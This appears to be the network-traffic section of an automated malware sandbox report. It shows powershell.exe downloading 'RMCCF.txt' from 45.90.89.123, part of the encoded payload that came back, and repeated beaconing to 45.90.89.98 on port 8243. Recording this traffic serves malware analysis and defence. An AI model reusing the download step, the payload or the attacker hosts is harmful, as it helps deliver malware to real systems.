                                                              Oct 2, 2024 05:29:28.280602932 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280621052 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.280642986 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280659914 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280684948 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.280684948 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.280728102 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280741930 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280756950 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280832052 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280846119 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280853987 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.280853987 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.280859947 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280874968 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280889034 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280905008 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280915976 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.280915976 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.280920029 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.280965090 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.280973911 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.281003952 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.281019926 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.281033993 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.281049967 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.281049967 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.281114101 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.281128883 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.281138897 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.281138897 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.281142950 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.281156063 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.281172037 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.281194925 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.281194925 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.281217098 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.281233072 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.281248093 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.281261921 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.281291008 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.281291008 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.281291962 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.281306028 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.281390905 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323179007 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323203087 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323247910 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323259115 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323276043 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323287010 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323297977 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323307991 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323313951 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323319912 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323338985 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323338985 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323352098 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323391914 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323391914 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323436022 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323446989 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323457956 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323467970 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323484898 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323496103 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323508978 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323510885 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323518991 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323530912 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323543072 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323548079 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323548079 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323569059 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323632002 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323643923 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323653936 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323678017 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323717117 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.323749065 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323760033 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323771000 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323781967 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323793888 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.323811054 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.454952002 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454961061 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454961061 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.454961061 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.454961061 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.454972029 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.454982996 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455012083 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455012083 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455039024 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455049038 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455060005 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455087900 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455096960 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455110073 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455121040 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455137968 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455182076 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455288887 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455301046 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455312014 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455323935 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455334902 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455346107 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455348015 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455358982 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455369949 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455393076 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455404997 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455404997 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455404997 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.455405951 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.455523968 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.496680975 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496694088 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496700048 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496711969 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496716976 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496728897 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496735096 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496740103 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496784925 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496851921 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.496866941 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496879101 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496886969 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.496890068 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496902943 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496948004 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.496948004 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.496982098 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.496998072 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.497009039 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.497020960 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.497047901 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.497047901 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.497076035 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.497095108 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.497106075 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.497117043 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.497138023 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.497162104 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.497162104 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.551388025 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.919708967 CEST497088243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:29:28.924668074 CEST82434970845.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:29:28.924745083 CEST497088243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:29:28.931718111 CEST497088243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:29:28.936359882 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.936480045 CEST82434970845.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:29:50.329617977 CEST82434970845.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:29:50.329694986 CEST497088243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:29:50.329792023 CEST497088243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:29:50.334584951 CEST82434970845.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:29:51.333445072 CEST497138243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:29:51.338356972 CEST82434971345.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:29:51.338442087 CEST497138243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:29:51.341775894 CEST497138243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:29:51.347202063 CEST82434971345.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:12.684313059 CEST82434971345.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:12.684380054 CEST497138243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:12.684472084 CEST497138243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:12.689189911 CEST82434971345.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:13.692903996 CEST608988243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:13.697936058 CEST82436089845.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:13.698040009 CEST608988243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:13.701656103 CEST608988243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:13.707577944 CEST82436089845.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:35.061177969 CEST82436089845.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:35.061345100 CEST608988243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:35.061392069 CEST608988243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:35.066273928 CEST82436089845.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:36.067759991 CEST608998243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:36.072602987 CEST82436089945.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:36.072680950 CEST608998243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:36.076843977 CEST608998243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:36.081566095 CEST82436089945.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:57.500905037 CEST82436089945.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:57.500976086 CEST608998243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:57.501050949 CEST608998243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:57.505831957 CEST82436089945.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:58.505439043 CEST609008243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:58.510392904 CEST82436090045.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:30:58.510473967 CEST609008243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:58.514303923 CEST609008243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:30:58.519072056 CEST82436090045.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:31:19.894217968 CEST82436090045.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:31:19.894304991 CEST609008243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:31:19.894351006 CEST609008243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:31:19.899279118 CEST82436090045.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:31:20.896199942 CEST609018243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:31:20.901194096 CEST82436090145.90.89.98192.168.2.10
                                                              Oct 2, 2024 05:31:20.901276112 CEST609018243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:31:20.906311989 CEST609018243192.168.2.1045.90.89.98
                                                              Oct 2, 2024 05:31:20.911190033 CEST82436090145.90.89.98192.168.2.10
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 2, 2024 05:29:21.055444002 CEST5992753192.168.2.101.1.1.1
                                                              Oct 2, 2024 05:29:21.203010082 CEST53599271.1.1.1192.168.2.10
                                                              Oct 2, 2024 05:30:02.714600086 CEST5357638162.159.36.2192.168.2.10
                                                              Oct 2, 2024 05:30:03.203651905 CEST53594471.1.1.1192.168.2.10
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Oct 2, 2024 05:29:21.055444002 CEST192.168.2.101.1.1.10x2b7cStandard query (0)ia600100.us.archive.orgA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Oct 2, 2024 05:29:21.203010082 CEST1.1.1.1192.168.2.100x2b7cNo error (0)ia600100.us.archive.org207.241.227.240A (IP address)IN (0x0001)false
                                                              • ia600100.us.archive.org
                                                              • 45.90.89.123
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.104970745.90.89.123807484C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              Oct 2, 2024 05:29:26.972961903 CEST76OUTGET /2117/RMCCF.txt HTTP/1.1
                                                              Host: 45.90.89.123
                                                              Connection: Keep-Alive
                                                              Oct 2, 2024 05:29:27.676702976 CEST1236INHTTP/1.1 200 OK
                                                              Date: Wed, 02 Oct 2024 03:29:27 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                              Last-Modified: Thu, 19 Sep 2024 10:29:15 GMT
                                                              ETag: "a1000-6227664f1b339"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 659456
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: text/plain
                                                              Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                              Oct 2, 2024 05:29:27.676723957 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                              Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                              Oct 2, 2024 05:29:27.676738024 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                              Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                              Oct 2, 2024 05:29:27.676748991 CEST1236INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                              Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                              Oct 2, 2024 05:29:27.676759958 CEST1236INData Raw: 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44
                                                              Data Ascii: yDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz
                                                              Oct 2, 2024 05:29:27.676769972 CEST1236INData Raw: 6f 2f 50 77 2f 6a 35 2f 77 39 50 53 2f 44 79 2f 34 37 50 79 2b 7a 70 2f 30 35 50 54 2b 54 69 2f 38 33 50 6b 39 54 53 2f 59 79 50 44 34 44 36 2b 34 74 50 55 37 6a 79 2b 41 73 50 32 36 44 72 2b 49 71 50 59 36 6a 6a 2b 51 6f 50 36 35 44 63 2b 59 6d
                                                              Data Ascii: o/Pw/j5/w9PS/Dy/47Py+zp/05PT+Ti/83Pk9TS/YyPD4D6+4tPU7jy+AsP26Dr+IqPY6jj+QoP65Dc+YmPc5jU+gkP+4TN+4gPG0z79scPP2TU9QBPYzTy8oLPHyzf7s7Ozuzq7M2O+sDH6cvOorT26QBOGjjH4IwN+dTYzU5MPOzez01MLNjRxceMzGjgxwXMVAjKwsBMPAAAAQKAFAHAAAwP//j4/o9Pw+Ta/k0P98TM/0xP
                                                              Oct 2, 2024 05:29:27.676783085 CEST776INData Raw: 35 44 55 2b 67 52 50 41 33 44 73 39 59 61 50 5a 32 7a 6a 39 41 59 50 6d 31 7a 58 39 67 56 50 52 31 6a 48 39 6b 51 50 45 77 7a 38 38 6b 4f 50 4c 7a 7a 72 38 30 4a 50 4c 79 44 66 38 49 67 4f 35 72 6a 30 36 63 6d 4f 41 6c 7a 6d 32 49 74 4e 7a 61 54
                                                              Data Ascii: 5DU+gRPA3Ds9YaPZ2zj9AYPm1zX9gVPR1jH9kQPEwz88kOPLzzr80JPLyDf8IgO5rj06cmOAlzm2ItNzaTR1oeNJSTv0ALNoSzezU0MCIT4yktMBLTrxAeMxGTQwYPMuDjcwsGMrAAAAAHAEAOAAAwPM/zn/w1PR9DS/QiP+7j9+cpPP6zX+4UPh2DN9QBPlzT38UMP5yjc84FPksDw7U3OstzY700OBtzI7sxOQszB6EvObrDo
                                                              Oct 2, 2024 05:29:27.676836014 CEST1236INData Raw: 41 41 42 67 43 77 50 74 2b 54 6b 2b 51 6e 50 2b 30 7a 6b 39 4d 59 50 70 30 6a 42 38 41 4e 50 2b 79 7a 68 38 77 45 50 78 77 54 41 37 67 38 4f 54 74 54 52 37 41 30 4f 7a 73 54 48 37 63 77 4f 41 6f 7a 33 35 38 2b 4e 7a 66 7a 49 33 51 67 4e 69 62 44
                                                              Data Ascii: AABgCwPt+Tk+QnP+0zk9MYPp0jB8ANP+yzh8wEPxwTA7g8OTtTR7A0OzsTH7cwOAoz358+NzfzI3QgNibDd2IlNCZTL2MSNCWTb1QWNXVDT0YPNuTTy0EMNTSDj0sHNxRzZ0AGNRRzS0QEN5ITvyIrMSFj+xQfMuHz2x0cMFHjrxQaMZGzkx4YMpFDYxwTM0AT9w0OMsCTow4EMIBAAAAKAEAJA/E+PZ/zy/M8P6+Ts/k6Ph+Tm
